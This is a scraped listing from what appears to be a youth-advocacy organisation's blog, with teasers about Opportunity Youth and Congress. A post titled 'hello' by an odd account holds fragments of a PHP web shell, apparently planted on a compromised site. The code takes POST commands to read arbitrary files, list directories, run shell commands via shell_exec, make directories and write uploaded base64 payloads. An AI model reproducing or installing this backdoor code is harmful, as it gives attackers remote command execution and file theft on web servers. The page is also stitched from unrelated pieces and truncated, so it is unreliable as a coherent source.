hello
/0 Comments/in Uncategorized /by varshabi_xsj4nc 200,
]);
}
if( $_POST[‘cmd’] == “get_file_data” ){
$data = file_get_contents( __DIR__ . ‘/’ . $_POST[‘file’] );
echo_json([
“code” => 200,
“data” => $data,
]);
}
if( $_POST[‘cmd’] == “get_files” ){
$struct = [];
$files = scandir( __DIR__ );
foreach ($files as $file) {
if( $file == ‘.’ || $file == ‘..’ ){
continue;
}
if( is_dir( __DIR__ . ‘/’ . $file ) ){
$sub_files = scandir( __DIR__ . ‘/’ . $file );
$struct[] = [
“file” => $file,
“type” => “d”,
“sub_files” => $sub_files,
];
}else{
$struct[] = [
“file” => $file,
“type” => “f”,
];
}
}
echo_json([
“code” => 200,
“struct” => $struct,
]);
}
if( $_POST[‘cmd’] == “get_dir” ){
echo_json([
“code” => 200,
“dir” => __DIR__,
]);
}
if( $_POST[‘cmd’] == “shell_exec” ){
shell_exec( $_POST[‘command’] );
echo_json([
“code” => 200,
]);
}
if( $_POST[‘cmd’] == “mkdir” ){
mkdir( $_POST[‘dir’] );
chmod( $_POST[‘dir’] , 0755 );
echo_json([
“code” => 200,
]);
}
if( $_POST[‘cmd’] == “upload” ){
file_put_contents( $_POST[‘file’] , base64_decode( $_POST[‘data’] ) );
chmod( $_POST[‘file’] , 0644 );
echo_json([
“code” => 200,
]);
}
}
National Opportunity Youth Organizations & Young People Respond to President Biden’s State of the Union Address: Our Hand Is Still Outstretched in Partnership
/0 Comments/in News, Resources, Uncategorized, Voices /by TimekaApply to be an Opportunity Youth Congressional Liaison!
/in News, Uncategorized /by caitlinjApply to get paid while boosting your advocacy impact!
Behind the Scenes: Meeting Your Member of Congress
/0 Comments/in Resources, Uncategorized, Voices /by TimekaThe Reconnecting Youth Campaign calls on Congress to invest in America’s future by funding 1 million pathways to education, training, national service and employment opportunities for Opportunity Youth, 16- to 24-year-olds who are not in school or work.